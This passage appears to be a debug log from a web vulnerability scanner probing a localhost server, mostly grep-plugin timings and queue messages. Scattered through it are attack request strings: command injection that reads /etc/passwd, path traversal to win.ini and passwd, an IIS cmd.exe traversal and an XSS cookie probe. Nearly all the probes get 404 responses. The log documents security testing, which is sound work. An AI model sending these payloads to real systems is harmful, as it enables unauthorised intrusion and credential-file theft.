(id=24995,from_cache=0,grep=1,rtt=0.18,did=LNjf4xdr) [Wed Feb 12 10:04:37 2020 - debug] analyze_cookies.grep(uri="http://localhost:9090/7/") took 0.02s to run [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2512. [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.get() from GrepIn DiskDict was used to read an item from disk. The current GrepIn DiskDict size is 4554. [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2513. [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4554. [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4555. [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4556. [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4557. [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4558. [Wed Feb 12 10:04:37 2020 - debug] SEARCH http://localhost:9090/ returned HTTP code "404" (id=25002,from_cache=0,grep=1,rtt=0.10,did=9ft1cYFr) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/syshelp/cscript/showfunc.stm?func= returned HTTP code "404" (id=25003,from_cache=0,grep=1,rtt=0.11,did=5nRNWeKi) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/perl/env.pl returned HTTP code "404" (id=25004,from_cache=0,grep=1,rtt=0.25,did=LaaEY33B) [Wed Feb 12 10:04:37 2020 - debug] symfony.grep(uri="http://localhost:9090/50/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] file_upload.grep(uri="http://localhost:9090/50/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/cgi-bin/fpadmin.htm returned HTTP code "404" (id=25001,from_cache=0,grep=1,rtt=0.02,did=PNxqPPdU) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/_vti_bin/fpcount.exe returned HTTP code "404" (id=25005,from_cache=0,grep=1,rtt=0.21,did=HwsB2zTf) [Wed Feb 12 10:04:37 2020 - debug] cross_domain_js.grep(uri="http://localhost:9090/50/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] wsdl_greper.grep(uri="http://localhost:9090/50/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] expect_ct.grep(uri="http://localhost:9090/50/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] svn_users.grep(uri="http://localhost:9090/50/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] xss_protection_header.grep(uri="http://localhost:9090/50/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] private_ip.grep(uri="http://localhost:9090/50/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] retirejs.grep(uri="http://localhost:9090/50/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] code_disclosure.grep(uri="http://localhost:9090/50/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2514. [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4559. [Wed Feb 12 10:04:37 2020 - debug] POST http://localhost:9090/admin/db.php returned HTTP code "404" (id=25008,from_cache=0,grep=1,rtt=0.08,did=UCzOre4g) [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/SiteServer/Publishing/ViewCode.asp returned HTTP code "404" (id=25009,from_cache=0,grep=1,rtt=0.10,did=OIcHbCjf) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/cgi-bin/GWWEB.EXE?HELP=bad-request returned HTTP code "404" (id=25010,from_cache=0,grep=1,rtt=0.20,did=SWtiu2mD) [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/index.html.en returned HTTP code "404" (id=25011,from_cache=0,grep=1,rtt=0.10,did=2gUjtbf2) [Wed Feb 12 10:04:37 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 13297, 'reject-seen-url': 5853, 'reject-out-of-scope': 216, 'accept': 5009} [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/cgi-bin/rtm.log returned HTTP code "404" (id=25012,from_cache=0,grep=1,rtt=0.02,did=MGydsBze) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/acart2_0/admin/index.asp?msg= returned HTTP code "404" (id=25013,from_cache=0,grep=1,rtt=0.05,did=6iOwS1Ao) [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/tomcat-docs/index.html returned HTTP code "404" (id=25014,from_cache=0,grep=1,rtt=0.10,did=ErC3f7rV) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/shop/normal_html.cgi?file=|cat /etc/passwd| returned HTTP code "404" (id=25015,from_cache=0,grep=1,rtt=0.10,did=LY7btuQN) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/admin/system.php3?cmd=dir c:\\\\ returned HTTP code "404" (id=25007,from_cache=0,grep=1,rtt=0.23,did=t4tWdwuy) [Wed Feb 12 10:04:37 2020 - debug] meta_generator.grep(uri="http://localhost:9090/50/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] Unknown post-data. Content-type: "None" and/or post-data "" [Wed Feb 12 10:04:37 2020 - debug] serialized_object.grep(uri="http://localhost:9090/50/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] blank_body.grep(uri="http://localhost:9090/50/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] path_disclosure.grep(uri="http://localhost:9090/50/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] strange_http_codes.grep(uri="http://localhost:9090/50/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] credit_cards.grep(uri="http://localhost:9090/50/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] websockets_links.grep(uri="http://localhost:9090/50/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] csp.grep(uri="http://localhost:9090/50/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] dom_xss.grep(uri="http://localhost:9090/50/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] strict_transport_security.grep(uri="http://localhost:9090/50/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] keys.grep(uri="http://localhost:9090/50/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4560. [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2515. [Wed Feb 12 10:04:37 2020 - debug] clamav.grep(uri="http://localhost:9090/50/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2516. [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/cgi-bin/htimage.exe/path/filename?2,2= returned HTTP code "404" (id=25006,from_cache=0,grep=1,rtt=0.08,did=DfvCxFpe) [Wed Feb 12 10:04:37 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 13297, 'reject-seen-url': 5853, 'reject-out-of-scope': 216, 'accept': 5009} [Wed Feb 12 10:04:37 2020 - debug] motw.grep(uri="http://localhost:9090/50/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2517. [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/examples/forward1 returned HTTP code "404" (id=25017,from_cache=0,grep=1,rtt=0.09,did=mUCjqtzk) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/@FORUMcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma="&echo \'\'=& echo `id `=&die()=&echo"= returned HTTP code "404" (id=25016,from_cache=0,grep=1,rtt=0.04,did=601yRkkW) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/test/jsp/pageAutoFlush.jsp returned HTTP code "404" (id=25018,from_cache=0,grep=1,rtt=0.13,did=Y8BgsJxb) [Wed Feb 12 10:04:37 2020 - debug] vulners_db.grep(uri="http://localhost:9090/50/") took 0.18s to run [Wed Feb 12 10:04:37 2020 - debug] dot_net_event_validation.grep(uri="http://localhost:9090/50/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] objects.grep(uri="http://localhost:9090/50/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] error_500.grep(uri="http://localhost:9090/50/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] meta_tags.grep(uri="http://localhost:9090/50/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] password_profiling.grep(uri="http://localhost:9090/50/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] click_jacking.grep(uri="http://localhost:9090/50/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] directory_indexing.grep(uri="http://localhost:9090/50/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] lang.grep(uri="http://localhost:9090/50/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4561. [Wed Feb 12 10:04:37 2020 - debug] url_session.grep(uri="http://localhost:9090/50/") took 0.06s to run [Wed Feb 12 10:04:37 2020 - debug] hash_analysis.grep(uri="http://localhost:9090/50/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2518. [Wed Feb 12 10:04:37 2020 - debug] error_pages.grep(uri="http://localhost:9090/50/") took 0.02s to run [Wed Feb 12 10:04:37 2020 - debug] strange_reason.grep(uri="http://localhost:9090/50/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] content_sniffing.grep(uri="http://localhost:9090/50/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] user_defined_regex.grep(uri="http://localhost:9090/50/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] cache_control.grep(uri="http://localhost:9090/50/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] strange_headers.grep(uri="http://localhost:9090/50/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] ssn.grep(uri="http://localhost:9090/50/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] oracle.grep(uri="http://localhost:9090/50/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] feeds.grep(uri="http://localhost:9090/50/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4562. [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2519. [Wed Feb 12 10:04:37 2020 - debug] localhost:9090 connection pool stats (free:344 / in_use:5 / max:50 / total:349) [Wed Feb 12 10:04:37 2020 - debug] Connections with more in use time: (7d8cc8f162a3758a, 0.12 sec) (64c2b744345c9f6d, 0.09 sec) (bf412558545487c2, 0.03 sec) (6f57ce103ce15883, 0.02 sec) (d9c1319ecaa9c63e, 0.01 sec) [Wed Feb 12 10:04:37 2020 - debug] analyze_cookies.grep(uri="http://localhost:9090/50/") took 0.07s to run [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/?pattern=/etc/*&sort=name returned HTTP code "302" (id=25019,from_cache=0,grep=1,rtt=0.14,did=H72pqgbH) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK returned HTTP code "404" (id=25020,from_cache=0,grep=1,rtt=0.06,did=vfcSyafu) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/search.php?sess=your_session_id&lookfor=<=<=&script=>=>=&alert(document.cookie)=&/script= returned HTTP code "404" (id=25025,from_cache=0,grep=1,rtt=0.24,did=Eg1bb8cx) [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/_vti_log/_vti_cnf/ returned HTTP code "404" (id=25026,from_cache=0,grep=1,rtt=0.09,did=llFhhpi2) [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/bin/admin.pl returned HTTP code "404" (id=25021,from_cache=0,grep=1,rtt=0.04,did=6eryjatk) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/sysuser/docmgr/create.stm?path= returned HTTP code "404" (id=25022,from_cache=0,grep=1,rtt=0.02,did=ZZgk0Opi) [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/nethome/ returned HTTP code "404" (id=25023,from_cache=0,grep=1,rtt=0.12,did=YUYmE25N) [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/index.html.ru.iso-ru returned HTTP code "404" (id=25024,from_cache=0,grep=1,rtt=0.21,did=4C4F5z7Y) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/cgi-bin/main_menu.pl returned HTTP code "404" (id=25029,from_cache=0,grep=1,rtt=0.14,did=FNLnR4gU) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/iissamples/issamples/codebrws.asp returned HTTP code "404" (id=25030,from_cache=0,grep=1,rtt=0.09,did=2b5hXcb1) [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2520. [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.get() from GrepIn DiskDict was used to read an item from disk. The current GrepIn DiskDict size is 4562. [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/servlet/sqlcdsn returned HTTP code "404" (id=25033,from_cache=0,grep=1,rtt=0.12,did=ZtAiw5xB) [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/_vti_bin/ returned HTTP code "404" (id=25036,from_cache=0,grep=1,rtt=0.20,did=NG84iIZM) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/oprocmgr-status returned HTTP code "404" (id=25037,from_cache=0,grep=1,rtt=0.19,did=GCiRmDkI) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/.../.../.../ returned HTTP code "404" (id=25027,from_cache=0,grep=1,rtt=0.07,did=smR3YwWI) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/servlet/IsItWorking returned HTTP code "404" (id=25039,from_cache=0,grep=1,rtt=0.04,did=AgVeOgi3) [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/jservdocs/ returned HTTP code "404" (id=25040,from_cache=0,grep=1,rtt=0.11,did=hIsG6H2o) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/internal.sws?../../../../../../../../winnt/win.ini= returned HTTP code "404" (id=25034,from_cache=0,grep=1,rtt=0.07,did=NfXKOsLd) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/postnuke/bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK returned HTTP code "404" (id=25032,from_cache=0,grep=1,rtt=0.08,did=J62HoTfV) [Wed Feb 12 10:04:37 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4562. [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/search/inc/ returned HTTP code "404" (id=25028,from_cache=0,grep=1,rtt=0.09,did=cK1SU5YN) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/firewall/policy/dlg?q=-1&fzone=t>&tzone=dmz returned HTTP code "404" (id=25035,from_cache=0,grep=1,rtt=0.05,did=gtn0GVA2) [Wed Feb 12 10:04:37 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/pls/simpledad/admin_/adddad.htm?= returned HTTP code "404" (id=25031,from_cache=0,grep=1,rtt=0.11,did=FYOnjnmT) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/sysuser/docmgr/sendmail.stm?path= returned HTTP code "404" (id=25038,from_cache=0,grep=1,rtt=0.08,did=eV2oq9PK) [Wed Feb 12 10:04:37 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 13318, 'reject-seen-url': 5854, 'reject-out-of-scope': 216, 'accept': 5012} [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/icons/ returned HTTP code "404" (id=25041,from_cache=0,grep=1,rtt=0.17,did=7fcJqDtk) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/iissamples/sdk/asp/docs/Winmsdp.exe returned HTTP code "404" (id=25046,from_cache=0,grep=1,rtt=0.26,did=zIVN16UP) [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2521. [Wed Feb 12 10:04:37 2020 - debug] detailed.has_active_session() and detailed.login() [Wed Feb 12 10:04:37 2020 - debug] [auth.detailed] Checking if session for user admin is active (did: eXABXYbB) [Wed Feb 12 10:04:37 2020 - debug] symfony.grep(uri="http://localhost:9090/47/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] file_upload.grep(uri="http://localhost:9090/47/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] wsdl_greper.grep(uri="http://localhost:9090/47/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] cross_domain_js.grep(uri="http://localhost:9090/47/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/shop/member_html.cgi?file=&cat /etc/passwd|= returned HTTP code "404" (id=25042,from_cache=0,grep=1,rtt=0.11,did=WOxkFFVF) [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/cgi-bin/test-cgi.bat returned HTTP code "404" (id=25043,from_cache=0,grep=1,rtt=0.12,did=ARdqBdOm) [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4563. [Wed Feb 12 10:04:37 2020 - debug] localhost:9090 connection pool stats (free:341 / in_use:8 / max:50 / total:349) [Wed Feb 12 10:04:37 2020 - debug] Connections with more in use time: (c4bb52ddb520d1cd, 0.20 sec) (e645c0d7251d40ab, 0.14 sec) (2c163f6c0c1e5c8b, 0.13 sec) (cc17cbd0c89b916c, 0.12 sec) (afede4a3494d3bba, 0.07 sec) [Wed Feb 12 10:04:37 2020 - debug] expect_ct.grep(uri="http://localhost:9090/47/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] svn_users.grep(uri="http://localhost:9090/47/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2522. [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/cgi-bin/FileSeek.cgi?head=&cat /etc/passwd|=&foot= returned HTTP code "404" (id=25044,from_cache=0,grep=1,rtt=0.17,did=x8gaxNT0) [Wed Feb 12 10:04:37 2020 - debug] xss_protection_header.grep(uri="http://localhost:9090/47/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] private_ip.grep(uri="http://localhost:9090/47/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] motw.grep(uri="http://localhost:9090/47/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] meta_generator.grep(uri="http://localhost:9090/47/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] retirejs.grep(uri="http://localhost:9090/47/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] code_disclosure.grep(uri="http://localhost:9090/47/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] Unknown post-data. Content-type: "None" and/or post-data "" [Wed Feb 12 10:04:37 2020 - debug] serialized_object.grep(uri="http://localhost:9090/47/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] blank_body.grep(uri="http://localhost:9090/47/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] path_disclosure.grep(uri="http://localhost:9090/47/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] strange_http_codes.grep(uri="http://localhost:9090/47/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] credit_cards.grep(uri="http://localhost:9090/47/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/scripts/..\xc1\x1c../winnt/system32/cmd.exe?/c dir c:\\"= returned HTTP code "404" (id=25045,from_cache=0,grep=1,rtt=0.22,did=9JpcHY36) [Wed Feb 12 10:04:37 2020 - debug] websockets_links.grep(uri="http://localhost:9090/47/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] csp.grep(uri="http://localhost:9090/47/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/index.html.lu.utf8 returned HTTP code "404" (id=25049,from_cache=0,grep=1,rtt=0.13,did=s0hC5Et8) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/perl/samples/env.pl returned HTTP code "404" (id=25051,from_cache=0,grep=1,rtt=0.14,did=bh0zh7ij) [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/siteserver/publishing/viewcode.asp?source=/default.asp returned HTTP code "404" (id=25050,from_cache=0,grep=1,rtt=0.16,did=NMXb1DBN) [Wed Feb 12 10:04:37 2020 - debug] dom_xss.grep(uri="http://localhost:9090/47/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4564. [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/examplesWebApp/InteractiveQuery.jsp?person= returned HTTP code "404" (id=25047,from_cache=0,grep=1,rtt=0.03,did=2zX3bMoS) [Wed Feb 12 10:04:37 2020 - debug] vulners_db.grep(uri="http://localhost:9090/47/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/cgi-bin/cvslog.cgi?file=*&rev=&root= returned HTTP code "404" (id=25048,from_cache=0,grep=1,rtt=0.16,did=JeGI71Ve) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/examples/forward2 returned HTTP code "404" (id=25052,from_cache=0,grep=1,rtt=0.03,did=r3SWW8tx) [Wed Feb 12 10:04:37 2020 - debug] Updating socket timeout for localhost from 3.00 to 3.00 seconds [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2523. [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/cgi-bin/a1stats/a1disp3.cgi?../../../../../../../etc/passwd= returned HTTP code "404" (id=25053,from_cache=0,grep=1,rtt=0.05,did=zWcNJFYc) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/admin/exec.php3?cmd=cat /etc/passwd returned HTTP code "404" (id=25055,from_cache=0,grep=1,rtt=0.17,did=2cAhtDql) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/_private/form_results.htm returned HTTP code "404" (id=25056,from_cache=0,grep=1,rtt=0.06,did=bI1vnwqx) [Wed Feb 12 10:04:37 2020 - debug] strict_transport_security.grep(uri="http://localhost:9090/47/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] keys.grep(uri="http://localhost:9090/47/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] clamav.grep(uri="http://localhost:9090/47/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4565. [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/index.html.ru.koi8-r returned HTTP code "404" (id=25059,from_cache=0,grep=1,rtt=0.15,did=HECGZERy) [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/com/novell/gwmonitor/help/en/default.htm returned HTTP code "404" (id=25060,from_cache=0,grep=1,rtt=0.05,did=MqG7Cevc) [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2524. [Wed Feb 12 10:04:37 2020 - debug] url_session.grep(uri="http://localhost:9090/47/") took 0.08s to run [Wed Feb 12 10:04:37 2020 - debug] dot_net_event_validation.grep(uri="http://localhost:9090/47/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] objects.grep(uri="http://localhost:9090/47/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] error_500.grep(uri="http://localhost:9090/47/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] meta_tags.grep(uri="http://localhost:9090/47/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] password_profiling.grep(uri="http://localhost:9090/47/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] click_jacking.grep(uri="http://localhost:9090/47/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] directory_indexing.grep(uri="http://localhost:9090/47/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] lang.grep(uri="http://localhost:9090/47/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/bin/cfgwiz.exe returned HTTP code "404" (id=25054,from_cache=0,grep=1,rtt=0.22,did=bGesU0tD) [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4566. [Wed Feb 12 10:04:37 2020 - debug] Still have 1 unfinished tasks in CrawlInfraIn join() [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/cgi-bin/sensepost.exe?/c dir= returned HTTP code "404" (id=25058,from_cache=0,grep=1,rtt=0.13,did=0mt83EUr) [Wed Feb 12 10:04:37 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 13336, 'reject-seen-url': 5855, 'reject-out-of-scope': 216, 'accept': 5018} [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/index.html.es returned HTTP code "404" (id=25057,from_cache=0,grep=1,rtt=0.14,did=OvdgL5mn) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/images/?pattern=/etc/*&sort=name returned HTTP code "404" (id=25067,from_cache=0,grep=1,rtt=0.21,did=eQmwfVb7) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/opendir.php?/etc/passwd= returned HTTP code "404" (id=25065,from_cache=0,grep=1,rtt=0.19,did=XiMQspLY) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/sysuser/docmgr/sendmail.stm?name= returned HTTP code "404" (id=25063,from_cache=0,grep=1,rtt=0.07,did=FlKMKksr) [Wed Feb 12 10:04:37 2020 - debug] hash_analysis.grep(uri="http://localhost:9090/47/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2525. [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/_vti_bin/admin.pl returned HTTP code "404" (id=25068,from_cache=0,grep=1,rtt=0.04,did=RRZbuPjz) [Wed Feb 12 10:04:37 2020 - debug] GET 